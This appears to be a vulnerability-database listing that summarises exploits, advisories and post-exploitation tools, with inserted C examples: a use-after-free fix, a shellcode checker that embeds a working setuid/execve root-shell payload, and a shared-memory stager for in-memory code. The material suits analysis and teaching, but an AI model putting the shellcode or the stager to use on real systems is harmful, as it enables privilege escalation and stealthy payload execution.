WMI Authenticated Exec Via Powershell Authenticated Exploit
This Metasploit module uses WMI execution to launch a payload instance on a remote machine. To avoid AV detection, all execution is performed in memory via a psh-net encoded payload. The persistence option can be set to keep the payload looping while a handler is present to receive it. By...
Microsoft Internet Explorer Memory Corruption (MS16-084: CVE-2016-3242)
A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page that could...
PowerShell Runspace Portable Post Exploitation Tool: PowerOPS
A PowerShell runspace portable post-exploitation tool aimed at making penetration testing with PowerShell "easier". PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It intends to...
Run Binaries From Memory: Pazuzu
Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL that uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios. For example, if you want to exploit a vulnerability and run your ow...
SuSE 11.3 Security Update : Mozilla Firefox (SAT Patch Number 10524)
Mozilla Firefox was updated to the 31.5.3 ESR release to fix two security vulnerabilities: - Security researcher ilxu1a reported, through HP Zero Day Initiative's Pwn2Own contest, a flaw in Mozilla's implementation of typed array bounds checking in JavaScript just-in-time (JIT) compilation and its...
IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (2)
Source: http://www.securityfocus.com/bid/9512/info. IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported to be prone to multiple vulnerabilities. The first issue exists in the onedcu binary. Specifically, when the binary is invoked a...
Firefox < 29.0 Multiple Vulnerabilities
The installed version of Firefox is prior to 29.0 and is therefore potentially affected by the following vulnerabilities: - An issue exists in the Network Security Services (NSS) library due to improper handling of IDNA domain prefixes for wildcard certificates. This issue could allow man-in-...
Novell GroupWise Client ActiveX SetEngine Pointer Manipulation
Added: 02/18/2013. CVE: CVE-2012-0439. BID: 57658. OSVDB: 89700. Background: Novell GroupWise is an e-mail and collaboration product suite. Problem: Several methods in the GroupWise ActiveX plugin do not validate user-supplied pointers that are passed as function arguments. This may allow an attacker t...
Multiple dangling pointer vulnerabilities — Mozilla
Security researcher regenrecht reported via TippingPoint's Zero Day Initiative two instances of code that modifies SVG element lists and fails to account for changes made to the list by user-supplied callbacks before accessing list elements. If a user-supplied callback deleted such an object, the...
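The pattern behind this class of bug, as an added example that is not from the Mozilla code or advisory: a list walker that caches the length and reuses an element pointer after handing control to a user callback, next to a hardened version that re-resolves each element against the live list before touching it. The `Elem`/`List` types, the `kill_two_at_2` callback and the id-based lookup are my own constructed stand-ins for the engine's SVG list and callback machinery.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-ins for the engine's element list (assumed shapes). */
typedef struct { int id; } Elem;
typedef struct { Elem **items; size_t len; } List;
typedef void (*visit_fn)(List *, Elem *);

List *make_list(int n)
{
    List *l = calloc(1, sizeof *l);
    l->items = calloc((size_t)n, sizeof *l->items);
    for (int i = 0; i < n; i++) {
        l->items[i] = calloc(1, sizeof **l->items);
        l->items[i]->id = i;
    }
    l->len = (size_t)n;
    return l;
}

void list_remove(List *l, size_t idx)
{
    free(l->items[idx]);
    memmove(&l->items[idx], &l->items[idx + 1], (l->len - idx - 1) * sizeof *l->items);
    l->len--;
}

void free_list(List *l)
{
    while (l->len) list_remove(l, l->len - 1);
    free(l->items);
    free(l);
}

Elem *find_by_id(const List *l, int id)
{
    for (size_t i = 0; i < l->len; i++)
        if (l->items[i]->id == id) return l->items[i];
    return NULL;
}

/* Vulnerable pattern (for contrast only; never executed here): the length is
 * cached before the loop and the element is touched again after the callback,
 * so a callback that deletes entries leaves `e` dangling and `i` running past
 * the shrunken list. */
int for_each_unsafe(List *l, visit_fn cb)
{
    size_t n = l->len;
    int visited = 0;
    for (size_t i = 0; i < n; i++) {
        Elem *e = l->items[i];      /* may read past l->len after a removal */
        cb(l, e);
        visited += (e->id >= 0);    /* use-after-free if cb removed e */
    }
    return visited;
}

/* Hardened: snapshot the identities up front and re-resolve each one against
 * the live list immediately before use. Anything the callback deleted is
 * skipped, and no element is dereferenced after control has left this loop. */
int for_each_safe(List *l, visit_fn cb)
{
    size_t n = l->len;
    int *ids = malloc(n * sizeof *ids);
    int visited = 0;
    for (size_t i = 0; i < n; i++) ids[i] = l->items[i]->id;
    for (size_t i = 0; i < n; i++) {
        Elem *e = find_by_id(l, ids[i]);
        if (!e) continue;           /* removed by an earlier callback */
        cb(l, e);                   /* e is not used after this point */
        visited++;
    }
    free(ids);
    return visited;
}

/* Constructed callback: when it sees id 2 it deletes that element and its
 * successor, the kind of list mutation the advisory describes. */
void kill_two_at_2(List *l, Elem *e)
{
    if (e->id != 2) return;
    for (size_t i = 0; i < l->len; i++) {
        if (l->items[i] != e) continue;
        list_remove(l, i);
        if (i < l->len) list_remove(l, i);
        return;
    }
}

int main(void)
{
    List *l = make_list(5);
    int visited = for_each_safe(l, kill_two_at_2);
    printf("visited %d elements, %zu remain:", visited, l->len);
    for (size_t i = 0; i < l->len; i++) printf(" %d", l->items[i]->id);
    printf("\n");
    free_list(l);
    return 0;
}
```

With five elements, the safe walk visits 0, 1, 2 and 4 (3 was deleted by the callback and is skipped on re-lookup) and leaves three elements; the unsafe walk would instead read `items[3]` and `items[4]` of a three-element list and dereference the freed element 2.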
JITed stage-0 shellcode
Shellcode exploit for the win32 platform. Title: JITed stage-0 shellcode. Author: Alexey Sintsov. Download: N/A. // JITS0.AS // VirtualProtect stage-0 shellcode // how to use stack // 0000: 0x11111111 -- ret addr to JIT stage-0 shellcode // 0004: 0x60616f62 -- pointer on string atom encoded high if...
DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)
DeepBurner Pro 1.9.0.228 .dbr file buffer overflow exploit (universal). Buffer layout: header (253 bytes) + junk + next SEH + SEH address + tail (957 bytes), delivered as a .dbr/.dbi file. Date: 29.01.2010. Discovery credits: fl0 fl0w. Exploit credits: fl0 fl0w. Download the latest vulnerable version from: http://www.deepburner.com/?r=downlo...
Design/Logic Flaw
The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 contains an unsafe interface that is exposed by JDirect, which allows remote attackers to free arbitrary memory and thereby execute arbitrary code...
linux/x86 setuid(0) and /bin/sh execve() shellcode 30 bytes
$Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $. setuid-linux.c - setuid/execve shellcode for Linux/x86. Copyright (c) 2004 Marco Ivaldi [email protected]. Short, fully functional setuid(0) and /bin/sh execve() shellcode. setuid(0): 8049380: 6a 17 push...
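The checks a practitioner runs on a payload like this before dropping it into an exploit, as an added example that is not part of the listing: decode the byte string instruction by instruction (for the small IA-32 opcode subset a setuid/execve stub uses), count the `int 0x80` syscalls, confirm there are no bad bytes for the delivery channel, and rebuild the path that the `push imm32` pair leaves on the stack. The 30 bytes in `sc` are my reconstruction of a setuid(0) + execve("/bin//sh") sequence matching the listing's description (push 0x17 / pop eax / xor ebx,ebx / int 0x80, then the execve block), not bytes copied from the page.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed sample: 30-byte setuid(0); execve("/bin//sh", argv, NULL). */
static const unsigned char sc[] =
    "\x6a\x17"             /* push 0x17          (SYS_setuid) */
    "\x58"                 /* pop eax */
    "\x31\xdb"             /* xor ebx,ebx        (uid = 0) */
    "\xcd\x80"             /* int 0x80 */
    "\x6a\x0b"             /* push 0x0b          (SYS_execve) */
    "\x58"                 /* pop eax */
    "\x99"                 /* cdq                (edx = 0, later envp) */
    "\x52"                 /* push edx           (string terminator) */
    "\x68\x2f\x2f\x73\x68" /* push "//sh" */
    "\x68\x2f\x62\x69\x6e" /* push "/bin" */
    "\x89\xe3"             /* mov ebx,esp        (filename) */
    "\x52"                 /* push edx           (argv[1] = NULL) */
    "\x53"                 /* push ebx           (argv[0]) */
    "\x89\xe1"             /* mov ecx,esp        (argv) */
    "\xcd\x80";            /* int 0x80 */
#define SC_LEN (sizeof(sc) - 1)   /* drop the literal's trailing NUL */

/* Length of the instruction at p for the opcode subset this stub uses.
 * 0 means "not in the subset" so the walker stops instead of desynchronising.
 * xor/mov are only accepted in register-direct ModRM form (0xc0..0xff). */
static size_t insn_len(const unsigned char *p, size_t rem)
{
    if (rem == 0) return 0;
    unsigned char op = p[0];
    if (op >= 0x50 && op <= 0x5f) return 1;                              /* push/pop r32 */
    if (op == 0x99) return 1;                                            /* cdq */
    if ((op == 0x6a || op == 0xcd) && rem >= 2) return 2;                /* push imm8, int imm8 */
    if ((op == 0x31 || op == 0x89) && rem >= 2 && p[1] >= 0xc0) return 2; /* xor/mov r32,r32 */
    if (op == 0x68 && rem >= 5) return 5;                                /* push imm32 */
    return 0;
}

struct walk {
    size_t ninsn, nsyscall, npush32;
    unsigned char push32[8][4];   /* push imm32 immediates in program order */
};

/* Walk the buffer one instruction at a time. Returns 1 if decoding ends
 * exactly at the buffer end, 0 on an unknown opcode or truncated instruction. */
int walk_shellcode(const unsigned char *buf, size_t len, struct walk *w)
{
    memset(w, 0, sizeof *w);
    size_t i = 0;
    while (i < len) {
        size_t n = insn_len(buf + i, len - i);
        if (n == 0) return 0;
        if (buf[i] == 0xcd && buf[i + 1] == 0x80) w->nsyscall++;
        if (buf[i] == 0x68 && w->npush32 < 8)
            memcpy(w->push32[w->npush32++], buf + i + 1, 4);
        w->ninsn++;
        i += n;
    }
    return 1;
}

/* Offset of the first byte present in the bad-byte set, or -1 if clean.
 * A NUL-free check is the usual requirement for strcpy-style delivery. */
int find_bad_byte(const unsigned char *buf, size_t len,
                  const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) return (int)i;
    return -1;
}

/* Rebuild the string the push-imm32 sequence leaves on the stack. The stack
 * grows down, so the last push sits at the lowest address: emit the
 * immediates in reverse program order. Returns bytes written, 0 on failure. */
size_t recover_pushed_string(const unsigned char *buf, size_t len, char *out, size_t outlen)
{
    struct walk w;
    if (!walk_shellcode(buf, len, &w) || w.npush32 * 4 + 1 > outlen) return 0;
    size_t pos = 0;
    for (size_t k = w.npush32; k-- > 0; ) {
        memcpy(out + pos, w.push32[k], 4);
        pos += 4;
    }
    out[pos] = '\0';
    return pos;
}

int main(void)
{
    struct walk w;
    char path[64];
    printf("length: %zu bytes\n", SC_LEN);
    printf("decodes cleanly: %d\n", walk_shellcode(sc, SC_LEN, &w));
    printf("instructions: %zu, syscalls: %zu\n", w.ninsn, w.nsyscall);
    printf("first NUL byte at: %d\n", find_bad_byte(sc, SC_LEN, (const unsigned char *)"\0", 1));
    recover_pushed_string(sc, SC_LEN, path, sizeof path);
    printf("execve path: %s\n", path);
    return 0;
}
```

The decoder is deliberately narrow: anything outside the handled opcodes makes `walk_shellcode` return 0 rather than guess, which is the behaviour you want when a modified payload sneaks in an instruction you did not expect.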
linux/x86 shared memory exec 50 bytes
Shellcode exploit for the linux/x86 platform. [email protected] - http://www.nopninjas.com. Platform: Linux x86. Length: 50 bytes. This shellcode connects to the shared memory segment matching the key and executes the code at that address. xorl %edi,%edi xorl...
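Both halves of the staging scheme this stub relies on, written in C as an added example rather than taken from the listing: a stager that creates a SysV shared memory segment under an agreed key and copies the second stage into it, and a loader that does what the 50-byte stub does in assembly, namely look the segment up by key and attach it (optionally with Linux's SHM_EXEC so the mapping could be jumped to). The key value, the `stage1` marker bytes and the function names are my assumptions; the listing shows neither its key nor its payload, and this example never transfers control into the segment.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/* Key both sides agree on (assumed value; the listing does not show its key). */
#define STAGE_KEY ((key_t)0x6e6f7031)

/* Constructed stage-1 marker standing in for real second-stage code. */
static const unsigned char stage1[] = "STAGE-1 payload (constructed test bytes)";

/* Stager side: create a segment under this key and copy the payload in.
 * A stale segment with the same key is removed first. Returns the id or -1. */
int shm_stage(key_t key, const unsigned char *buf, size_t len)
{
    int id = shmget(key, len, IPC_CREAT | IPC_EXCL | 0700);
    if (id < 0) {
        int old = shmget(key, 0, 0);
        if (old < 0 || shmctl(old, IPC_RMID, NULL) < 0) return -1;
        id = shmget(key, len, IPC_CREAT | IPC_EXCL | 0700);
        if (id < 0) return -1;
    }
    void *p = shmat(id, NULL, 0);
    if (p == (void *)-1) { shmctl(id, IPC_RMID, NULL); return -1; }
    memcpy(p, buf, len);
    shmdt(p);
    return id;
}

/* Loader side: find the segment by key and attach it. With want_exec set,
 * request an executable mapping (Linux SHM_EXEC) so the contents could be
 * jumped to. Returns NULL if the key is unknown or the attach fails. */
void *shm_attach_by_key(key_t key, int want_exec)
{
    int id = shmget(key, 0, 0);
    if (id < 0) return NULL;
    int flags = 0;
    if (want_exec) {
#ifdef SHM_EXEC
        flags |= SHM_EXEC;
#else
        return NULL;   /* no executable SysV shm attach on this platform */
#endif
    }
    void *p = shmat(id, NULL, flags);
    return p == (void *)-1 ? NULL : p;
}

/* Copy the staged bytes out (size taken from IPC_STAT), detach, and remove
 * the segment so nothing is left behind. Returns bytes copied, 0 on failure. */
size_t shm_fetch_and_remove(key_t key, unsigned char *out, size_t outlen)
{
    int id = shmget(key, 0, 0);
    if (id < 0) return 0;
    struct shmid_ds ds;
    if (shmctl(id, IPC_STAT, &ds) < 0) return 0;
    size_t n = (size_t)ds.shm_segsz < outlen ? (size_t)ds.shm_segsz : outlen;
    void *p = shmat(id, NULL, SHM_RDONLY);
    if (p == (void *)-1) return 0;
    memcpy(out, p, n);
    shmdt(p);
    shmctl(id, IPC_RMID, NULL);
    return n;
}

int main(void)
{
    if (shm_stage(STAGE_KEY, stage1, sizeof stage1) < 0) { perror("shm_stage"); return 1; }
    void *exec_view = shm_attach_by_key(STAGE_KEY, 1);
    printf("executable attach: %s\n", exec_view ? "ok (not jumping)" : "unavailable");
    if (exec_view) shmdt(exec_view);
    unsigned char out[128];
    size_t n = shm_fetch_and_remove(STAGE_KEY, out, sizeof out);
    printf("fetched %zu bytes: %s\n", n, n ? (const char *)out : "");
    return 0;
}
```

From the defender's side the same lookup is what makes this technique visible: `ipcs -m` (or /proc/sysvipc/shm) lists every live segment with its key, owner and attach count, and a segment attached with SHM_EXEC by a process that has no business executing shared memory is a strong signal.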